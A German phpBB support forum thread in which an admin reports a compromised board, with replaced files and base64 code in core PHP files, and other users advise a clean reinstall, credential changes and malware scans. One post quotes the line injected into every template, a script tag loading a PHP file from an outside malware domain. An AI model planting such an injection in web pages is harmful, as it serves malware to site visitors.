Board gehackt?

[altermann]

Hallo,

vor 2 Tagen in der Nacht wurden auf dem Server fast alle Dateien neu aufgespielt (ich war es aber nicht). Das Board funktionierte nicht mehr richtig, der Style war total verschoben.

Ich habe dann alles noch einmal neu installiert und die alte DB wieder eingespielt - aber wieder war der Style verschoben (prosilver).

Als ich einige Dateien anpassen wollte für einen Mod kam eine Viruswarung: Found PhpAgent.AJ z.B. in der index.php und der functions.php

Im Code war unten nach dem </html> ein Script, dieses habe ich gelöscht und die Datei wieder upgeloadet.

Jetzt habe ich mal in die functions.php geschaut... die sieht am Anfang so aus:

Code: Alles auswählen

entfernt

Weiss jemand was hier los ist?

[patti2005]

Hallo,

mein tip, alle Dateien kontrollieren bzw. phpbb paket neu runter laden und auf deinem Server / webspace neu Hochladen, zu vor solltest du ggf. noch den ftp Zugang aendern wie Name und Passwort.
Die Schwachstelle war sicher nicht das Forum selbst sondern entweder dein ftp Zugang oder eben der Webspace selbst, am besten auch hier mal in die Logs des Servers schauen.

Aber interessant sollte auch [1] So mache ich mein Board sicher

Gruss

[altermann]

danke für die antwort.

ich hatte ja das board nochmal neu gedownloadet hier im downloadbereich und es dann neu installiert, also keine alten dateien verwendet.

in die logs habe ich geschaut, es war eine IP von Kabeldeutschland die mir nachts Dateien aufgespielt hat. Ich hätte eher eine IP aus dem Ausland erwartet...

[patti2005]

danke für die antwort.

ich hatte ja das board nochmal neu gedownloadet hier im downloadbereich und es dann neu installiert, also keine alten dateien verwendet.

in die logs habe ich geschaut, es war eine IP von Kabeldeutschland die mir nachts Dateien aufgespielt hat. Ich hätte eher eine IP aus dem Ausland erwartet...

Hallo,

wenn die Dateien nun sauber sind brauchst du diese natuerlich nicht erneut aufzuspielen, ansonsten wie gesagt besser noch mal gegen neue ersetzten, damit nicht irgend wo ein schlupfloch sitzt

die mir nachts Dateien aufgespielt hat

Die Dateien des Boards ? wenn ja wuerde ich mich da ja mal an Kabeldeutschland wenden mit den entsprechenden logs, wenn die zeiten etc. mit dem vorfall ueberinstimmen, die Daten des ftp Zugangs zu aendern, ist hier sicherlich nicht falsch, ich wuerde sogar noch den zugang von der DB aendern.

Ansonsten link oben folgen, hilft auch sehr, und zum thema Sicherheit steht hier ja auch im Forum auch einiges.

Gruss

[altermann]

habe eben festgestellt das es mir heute morgen wieder diverse dateien verändert hat auf dem Server zwischen 6 und 7 Uhr.

Wenn ich die alle bereinigen soll von dem Code sitze ich ja nächste Woche noch dran.

Weiss jemand was dieser Code denn eigentlich anstellen könnte?

Code: Alles auswählen

entfernt
*

Was wüprde es denn bringen wenn ich die DB-Daten ändere, die sind ja in der config.php, aber selst da ist ja der Code drin, also würde das sicher nix bringen.

[altermann]

habe eben festgestellt, dass auch alle Template-Dateien verändert sind (subsilver). In jeder datei ist folgender Code am Ende

Code: Alles auswählen

<br />
<!-- INCLUDE overall_footer.html --><script src=http://dmsegypt.org/images/Under-Construction.php ></script>

Ausserdem gibt es auch neue Dateien ... z.B. in /html/styles/subsilver2/theme/images/ eine gifimg.php

FTP-Daten habe ich inzwischen geändert...

[patti2005]

Hallo altermann,

Code: Alles auswählen

Wie ist die gegenwärtige Einstufung von dmsegypt.org?

    Diese Website ist als verdächtig eingestuft. Das Aufrufen dieser Website kann schädlich für Ihren Computer sein!

    Ein Bestandteil dieser Website wurde in den letzten 90 Tagen 2 mal aufgrund verdächtiger Aktivitäten auf die Liste gesetzt.

Welche Befunde hat Google beim Besuch dieser Website festgestellt?

    Bei 1 Seite(n) von insgesamt 11 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2010-02-20 und verdächtiger Content wurde auf dieser Website zuletzt am 2010-02-20 gefunden.

    Malicious software includes 19 exploit(s), 3 scripting exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
    This site was hosted on 1 network(s) including AS36351 (SOFTLAYER).

quelle : google

Wenn ich die alle bereinigen soll von dem Code sitze ich ja nächste Woche noch dran.

Daher schrieb ich auch, das du am besten alle Dateien loeschen sollst und neu aufspielen sollst, aus einem sauberen Paket, es waere sicher auch ratsam deinem Server Admin bzw. webspace hoster darueber zu unterrichten. ( weiss nicht wie die anderen das so handhaben )

Weiss jemand was dieser Code denn eigentlich anstellen könnte?

Er versucht sich zu tarnen um eben dort z.b. malwaere an deine Nutzer zu verteilen, der code wurde wohl per base 64 codiert um den Antiviren Programmen zu entgehen, was hier gott sei dank nicht geklappt hat wenn man sich deinen ersten post anschaut :

Viruswarung: Found PhpAgent.AJ z.B. in der index.php und der functions.php

Gruss

[altermann]

danke für die hilfe... bin greade dabei die dateien neu upzuloaden... irgendwas hab ich falsch gemacht dabei

[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4191: Cannot modify header information - headers already sent by (output started at /language/de/mods/lang_portal.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4193: Cannot modify header information - headers already sent by (output started at /language/de/mods/lang_portal.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4194: Cannot modify header information - headers already sent by (output started at /language/de/mods/lang_portal.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4195: Cannot modify header information - headers already sent by (output started at /language/de/mods/lang_portal.php:1)

weiss jemand was????

[aurora876]

hast du die sprachdateien im richtigen modus hochgeladen?
https://www.phpbb.de/kb/utf8bom

PS:
übrigens, mein virenscanner macht hier - seit dem ich diesen thread angeklickt hab - alarm wg dieses phpagent-usw.
evtl. solltest du den code entfernen... wer weiß, was sich hinter dem base64zeug verbirgt.

[roum]

Hallo,
haben mehrere User Zutritt zum Adminbereich?
Sowas hatte ich mal bei einem Forum wo der PC von einem der Admins infiziert war.
Ich habe bestimmt 3 mal in Handarbeit alle Dateien (PHP und HTML Dateien mit start oder index im Filenamen) gesäubert und meinen eigenen Rechner mehrfach mit diversen Tools überprüft.
Die Dateien wurden immer wieder wie von Geisterhand infiziert.
Nach längerer Recherche bin ich auf den Scanner von malwarebytes.org gestoßen, der diesen Schädling findet und auch löschen kann.
Den solltest du dir runterladen (die kostenfreie Version reicht aus) und deinen Rechner mal gründlich checken lassen. Wenn es noch mehr Admins/User mit ACP und besonders FTP Zugang gibt müssen das natürlich alle von denen machen.

Grüße